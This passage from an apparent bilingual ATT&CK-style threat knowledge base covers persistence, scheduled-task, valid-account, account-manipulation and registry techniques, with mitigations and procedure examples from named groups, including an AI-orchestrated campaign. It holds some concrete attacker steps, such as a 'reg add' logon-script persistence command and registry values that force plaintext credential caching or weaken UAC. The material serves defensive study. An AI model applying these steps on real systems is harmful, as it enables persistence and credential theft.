Management Console (mmc.exe), which in turn references the modified Registry key. Raspberry Robin will drop a copy of itself to a subfolder in <code>%Program Data%</code> or <code>%Program Data%\\Microsoft\\</code> to attempt privilege elevation and defense evasion if not running in Session 0. Nightdoor uses a legitimate executable to load a malicious DLL file for installation. SPAWNCHIMERA can persist across system upgrades by hijacking the execution flow of dspkginstall, a binary used during the system upgrade process. 敵対者は、コンテナ管理サービス/APIを悪用してコンテナ内でコマンドを実行することがある。 Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment. アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ネットワーク越しのリソースアクセスを制限する。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 コンテナ管理コマンドに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 TeamTNT executed Hildegard through the kubelet API run command and by executing commands on running containers. Kinsing was executed with an Ubuntu container entry point that runs shell scripts. Hildegard was executed through the kubelet API run command and by executing commands on running containers. Siloscape can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster. Peirates can use `kubectl` or the Kubernetes API to run commands. 敵対者は、悪意あるコンテナをデプロイしてコードを実行することがある。 Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to Escape to Host and access other containers running on the node. アカウントの作成・権限・ライフサイクルを適切に管理する。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク越しのリソースアクセスを制限する。 システムやアカウントを監査し、不正な活動を検出する。 コンテナのデプロイに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges. Kinsing was run through a deployed Ubuntu container. Doki was run through a deployed container. Peirates can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node. 敵対者は、サーバーレス機能（Lambda等）を悪用してコードを実行することがある。 Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. アカウントの作成・権限・ライフサイクルを適切に管理する。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 サーバーレス実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Pacu can create malicious Lambda functions. 敵対者は、クラウドの管理機能を悪用してVM等でコマンドを実行することがある。 Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 クラウド管理コマンドに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT29 has used Azure Run Command and Azure Admin-on-Behalf-of (AOBO) to execute code on virtual machines. VOID MANTICORE has abused built-in remote wipe or factory reset commands to wipe devices managed within an organization’s Cloud management solution impacting laptops, servers, and mobile devices. AADInternals can execute commands on Azure virtual machines using the VM agent. Pacu can run commands on EC2 instances using AWS Systems Manager Run Command. 敵対者は、キーストローク等の入力を注入してコマンドを実行することがある。 Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs). ハードウェアの接続を制限し、不正な機器の導入を防ぐ。 許可されていないコードの実行を防止する。 入力インジェクションに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 FIN7 has used malicious USBs to emulate keystrokes to launch PowerShell to download and execute malware from the adversary's server. 敵対者は、ESXiの管理機能を悪用してコマンドを実行することがある。 Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon` on macOS, and `vmtoolsd ` on Linux. アカウントの作成・権限・ライフサイクルを適切に管理する。 ESXi管理コマンドに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 UNC3886 used `vmtoolsd.exe` to run commands on guest virtual machines from a compromised ESXi host. VIRTUALPITA can execute commands on guest virtual machines from compromised ESXi hypervisors. 敵対者は、CI/CDパイプラインを汚染して悪意あるコードを実行することがある。 Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: アカウントの作成・権限・ライフサイクルを適切に管理する。 ソフトウェアを安全に構成し、悪用を防ぐ。 汚染パイプライン実行に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Shai-Hulud has also leveraged GitHub actions from stolen accounts in order to create a malicious Github workflow within `.github/workflows/discussion.yaml`. 敵対者は、起動/ログオン時に実行される初期化スクリプトを悪用して永続化することがある。 Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. 敵対者は、Windowsのログオンスクリプトを悪用して、ログオン時に悪意あるコードを実行し永続化することがある。Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system. This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key. 敵対者は、macOSのログインフックを悪用して永続化することがある。Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks. 敵対者は、ネットワークログオンスクリプトを悪用して永続化することがある。Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects. These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 敵対者は、RCスクリプト（rc.local等）を悪用して起動時に永続化することがある。Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. 敵対者は、スタートアップアイテムを悪用して起動時に永続化することがある。Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 起動/ログオン初期化スクリプトに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor used malicious boot scripts to install the Line Runner backdoor on victim devices. APT29 has hijacked legitimate application-specific startup scripts to enable malware to execute on system startup. APT41 used a hidden shell script in `/etc/rc.d/init.d` to leverage the `ADORE.XSEC`backdoor and `Adore-NG` rootkit. Rocke has installed an "init.d" startup script to maintain persistence. UNC3886 has attempted to bypass digital signature verification checks at startup by adding a command to the startup config `/etc/init.d/localnet` within the rootfs.gz archive of both FortiManager and FortiAnalyzer devices. Depending on the Linux distribution and when executing with root permissions, RotaJakiro may install persistence using a `.conf` file in the `/etc/init/` folder. VIRTUALPITA can persist as an init.d startup service on Linux vCenter systems. SPAWNCHIMERA has modified the boot process files within `/tmp/coreboot_fs/bin/init` to establish persistence. 敵対者は、タスクスケジューラ機能を悪用して、悪意あるコードを定期的または特定時刻に実行することがある。 Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system. 敵対者は、atコマンドを悪用してタスクをスケジュール実行することがある。Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with at by directly leveraging the Windows Management Instrumentation `Win32_ScheduledJob` WMI class. 敵対者は、cronを悪用してタスクを定期実行し永続化することがある。Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths. 敵対者は、Windowsのスケジュールされたタスクを悪用して実行・永続化することがある。Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path. 敵対者は、systemdタイマーを悪用してタスクを定期実行し永続化することがある。Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments. Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over SSH. 敵対者は、コンテナオーケストレーションのジョブ機能を悪用してタスクを実行・永続化することがある。Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 スケジュールされたタスク/ジョブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries set FortiGate scheduled tasks to run the adversary generated CLI scripts weekly. Lokibot's second stage DLL has set a timer using “timeSetEvent” to schedule its next execution. 敵対者は、有効なアカウントの認証情報を用いて検知を回避しアクセスすることがある。 Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. 敵対者は、デフォルトアカウントの認証情報を悪用してアクセスや権限維持を行うことがある。Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes. 敵対者は、ドメインアカウントの認証情報を悪用してアクセスや横展開を行うことがある。Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. 敵対者は、ローカルアカウントの認証情報を悪用してアクセスを行うことがある。Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 敵対者は、クラウドアカウントの認証情報を悪用してアクセスや権限維持を行うことがある。Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 有効なアカウントに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems. During Operation Wocao, threat actors used valid VPN credentials to gain initial access. During the SolarWinds Compromise, APT29 used different compromised credentials for remote access and to move laterally. During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network. During the C0032 campaign, TEMP.Veles used compromised VPN accounts. During HomeLand Justice, threat actors used a compromised Exchange account to search mailboxes and create new Exchange accounts. During Operation MidnightEclipse, threat actors extracted sensitive credentials while moving laterally through compromised networks. Leviathan used captured, valid account information to log into victim web applications and appliances during Leviathan Australian Intrusions. During RedPenguin, UNC3886 used legitimate credentials to gain priviliged access to Juniper routers. During 3CX Supply Chain Attack, AppleJeus has gained access to the 3CX corporate environment through legitimate VPN credentials. During the Anthropic AI-orchestrated Campaign, the adversary used harvested credentials to authenticate against internal APIs, database systems, container registries, and logging infrastructure across targeted networks. Axiom has used previously compromised administrative accounts to escalate privileges. Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder. Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars. PittyTiger attempts to obtain legitimate credentials during operations. APT29 has used a compromised account to access an organization's VPN infrastructure. APT18 actors leverage legitimate credentials to log into external remote services. Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks. Lazarus Group has used administrator credentials to gain access to restricted network segments. Sandworm Team have used previously acquired legitimate credentials prior to attacks. Dragonfly has compromised user credentials and used valid accounts for operations. To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes. Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner. menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments. FIN7 has harvested valid administrative credentials for lateral movement. OilRig has used compromised credentials to access other systems on a victim network. FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment. FIN8 has used valid accounts for persistence and lateral movement. APT33 has used valid accounts for initial access and privilege escalation. Leviathan has obtained valid accounts to gain initial access. FIN4 has used legitimate credentials to hijack email communications. APT39 has used stolen credentials to compromise Outlook Web Access (OWA). Silence has used compromised credentials to log on to other systems and escalate privileges. GALLIUM leveraged valid accounts to maintain access to a victim network. APT41 used compromised credentials to log on to other systems. Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers. Chimera has used a valid account to maintain persistence via scheduled task. Fox Kitten has used valid credentials with various services during lateral movement. Indrik Spider has used valid accounts for initial access and lateral movement. Indrik Spider has also maintained access to the victim environment through the VPN infrastructure. Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts. LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs. POLONIUM has used valid compromised credentials to gain access to victim environments. Scattered Spider has used compromised credentials for initial access. Volt Typhoon relies primarily on valid credentials for persistence. Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services. Akira uses valid account information to remotely access victim networks, such as VPN credentials. INC Ransom has used compromised valid accounts for access to victim environments. Star Blizzard has used stolen credentials to sign into victim email accounts. Play has used valid VPN accounts to achieve initial access. Sea Turtle used compromised credentials to maintain long-term access to victim environments. BlackByte has gained access to victim environments through legitimate VPN credentials. UNC3886 has used tools to hijack valid SSH accounts. Medusa Group has utilized compromised legitimate local and domain accounts within the victim environment to facilitate remote access and lateral movement sometimes in combination with PsExec. VOID MANTICORE has leveraged valid accounts to log into VPN infrastructure. VOID MANTICORE has used compromised valid credentials to gain access to management infrastructure and enterprise control systems. VOID MANTICORE has also validated and tested authentication using compromised credentials prior to malicious actions. Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware. Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials. Linux Rabbit acquires valid SSH accounts through brute force. Dtrack used hard-coded credentials to gain access to a network share. Kinsing has used valid SSH credentials to access remote hosts. Industroyer can use supplied user credentials to execute processes and stop services. LP-Notes has used stolen Windows credentials to log in as the users. 敵対者は、アカウントの権限や認証情報を操作してアクセスを維持することがある。 Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 敵対者は、追加のクラウド認証情報を登録してアクセスを維持することがある。Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. 敵対者は、追加のメール委任権限を付与してアクセスを維持することがある。Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 敵対者は、追加のクラウドロールを付与して権限を維持/昇格することがある。An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments. With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins). 敵対者は、SSH認証鍵を追加してアクセスを維持することがある。Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code> (or, on ESXi, `/etc/ssh/keys-<username>/authorized_keys`). Users may edit the system’s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>. 敵対者は、デバイスを登録してアクセスや永続化を行うことがある。Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. 敵対者は、追加のコンテナクラスタロールを付与して権限を維持することがある。An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account. Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions. This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. 敵対者は、ローカル/ドメイングループへの追加でアクセスや権限を維持することがある。An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 アカウント操作に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `sp_addlinkedsrvlogin` command in MS-SQL to create a link between a created account and other servers in the network. Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account. HAFNIUM has granted privileges to domain accounts and reset the password for default admin accounts. Scattered Spider has added accounts to the ESX Admins group to grant them full admin rights in vSphere. VOID MANTICORE has leveraged access to administrative control systems to achieve disruptive effects, consistent with administrative account abuse or privilege escalation within existing access. The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The <code>LSADUMP::ChangeNTLM</code> and <code>LSADUMP::SetNTLM</code> modules can also manipulate the password hash of an account without knowing the clear text value. Calisto adds permissions and remote logins to all users. Shai-Hulud has modified GitHub account settings for private repositories and changed them to public. 敵対者は、レジストリを改変して永続化や防御妨害を行うことがある。 Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. レジストリキーの権限を制限し、不正な改変を防ぐ。 レジストリの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and manipulate the Registry. During Operation Honeybee, the threat actors used batch files that modified registry keys. During Operation Wocao, the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 (disabled) to 1 (enabled). During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching `rundll32.exe`, which in-turn launches the malware and communicates with C2 servers over the Internet. . During SharePoint ToolShell Exploitation, threat actors, including Storm-2603, disabled security services via Registry modifications. Turla has modified Registry values to store payloads. A Threat Group-3390 tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`. Lotus Blossom has installed tools such as Sagerunex by writing them to the Windows registry. Dragonfly has modified the Registry to perform multiple techniques through the use of Reg. A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs. Gamaredon Group has removed security settings for VBA macro execution by changing registry values <code>HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\VBAWarnings</code> and <code>HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\AccessVBOM</code>. Gamaredon Group has also modified Registry keys to hide folders and system files and to add the C2 address under `HKEY_CURRENT_USER\Console\WindowsUpdate`. OilRig has used reg.exe to modify system configuration. APT32's backdoor has modified the Windows Registry to store the backdoor's configuration. Magic Hound has modified Registry settings for security tools. FIN8 has deleted Registry keys during post compromise cleanup activities. APT19 uses a Port 22 malware variant to modify several Registry keys. Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under <code>HKCU\Software\Microsoft\Office\</code>. APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys. Silence can create, delete, or modify a specified Registry key or value. TA505 has used malware to disable Windows Defender through modification of the Registry. Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence. Kimsuky has also modified the registry entry for `HKCU:\Software\Microsoft\Windows\CurrentVersion\Run` registry key for persistence with the name WindowsSecurityCheck. APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials. Wizard Spider has modified the Registry key <code>HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest</code> by setting the <code>UseLogonCredential</code> registry value to <code>1</code> in order to force credentials to be stored in clear text in memory. Wizard Spider has also modified the WDigest registry key to allow plaintext credentials to be cached in memory. Blue Mockingbird has used Windows Registry modifications to specify a DLL payload. Indrik Spider has modified registry keys to prepare for ransomware execution and to disable common administrative utilities. Aquatic Panda modified the victim registry to enable the `RestrictedAdmin` mode feature, allowing for pass the hash behaviors to function via RDP. Ember Bear modifies registry values for anti-forensics and defense evasion purposes. Earth Lusca modified the registry using the command <code>reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]”</code> for persistence. LuminousMoth has used malware that adds Registry keys for persistence. Volt Typhoon has used `netsh` to create a PortProxy Registry modification on a compromised server running the Paessler Router Traffic Grapher (PRTG). Saint Bear will leverage malicious Windows batch scripts to modify registry values associated with Windows Defender functionality. BlackByte performed Registry modifications to escalate privileges and disable security tools. APT42 has modified Registry keys to maintain persistence. Medusa Group has modified Registry keys to elevate privileges, maintain persistence and allow remote access. Taidoor has the ability to modify the Registry on compromised hosts using <code>RegDeleteValueA</code> and <code>RegCreateKeyExA</code>. PoisonIvy creates a Registry subkey that registers a new system device. PlugX has a module to create, delete, or modify Registry keys. Regin appears to have functionality to modify remote Registry information. Uroburos can store configuration information in the Registry including the initialization vector and AES key needed to find and decrypt other Uroburos components. CHOPSTICK may modify Registry keys to store RC4 encrypted configuration information. BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system. gh0st RAT has altered the InstallTime subkey. ADVSTORESHELL is capable of setting and deleting Registry values. Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface. Rover has functionality to remove Registry Run key persistence as a cleanup procedure. Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number. ComRAT has modified Registry values to store encrypted orchestrator code and payloads. Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting <code>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy</code> to 1. StreamEx has the ability to modify the Registry. RTM can delete all Registry entries created during its execution. Cobalt Strike can modify Registry values within <code>HKEY_CURRENT_USER\Software\Microsoft\Office\<Excel Version>\Excel\Security\AccessVBOM\</code> to enable the execution of additional code. SOUNDBITE is capable of modifying the Registry. PHOREAL is capable of manipulating the Registry. Volgmer modifies the Registry to store an encoded configuration file in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security</code>. NETWIRE can modify the Registry to store its configuration information. Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys. Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk. Nerex creates a Registry subkey that registers a new service. Orz can perform Registry operations. Bankshot writes data into the Registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj</code>. ROKRAT can modify the `HKEY_CURRENT_USER\Software\Microsoft\Office\` registry key so it can bypass the VB object model (VBOM) on a compromised host. SynAck can manipulate Registry keys. BADCALL modifies the firewall Registry key <code>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List</code>. PLAINTEE uses <code>reg add</code> to add a Registry Run key for persistence. Mosquito can modify Registry keys under <code>HKCU\Software\Microsoft\[dllname]</code> to store configuration values. Mosquito also modifies Registry keys under <code>HKCR\CLSID\...\InprocServer32</code> with a path to the launcher. InvisiMole has a command to create, set, copy, or delete a specified Registry key or value. Catchamas creates three Registry keys to establish persistence by adding a Windows Service. QuasarRAT has a command to edit the Registry on the victim’s machine. TYPEFRAME can install encrypted configuration data under the Registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll</code> and <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PrintConfigs</code>. TrickBot can modify registry entries. FELIXROOT deletes the Registry key <code>HKCU\Software\Classes\Applications\rundll32.exe\shell\open</code>. Bisonal has deleted Registry keys to clean up its prior activity. QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications. KEYMARBLE has a command to create Registry entries for storing data under <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath</code>. Zeus Panda modifies several Registry keys under <code>HKCU\Software\Microsoft\Internet Explorer\ PhishingFilter\</code> to disable phishing filters. Agent Tesla can achieve persistence by modifying Registry key entries. 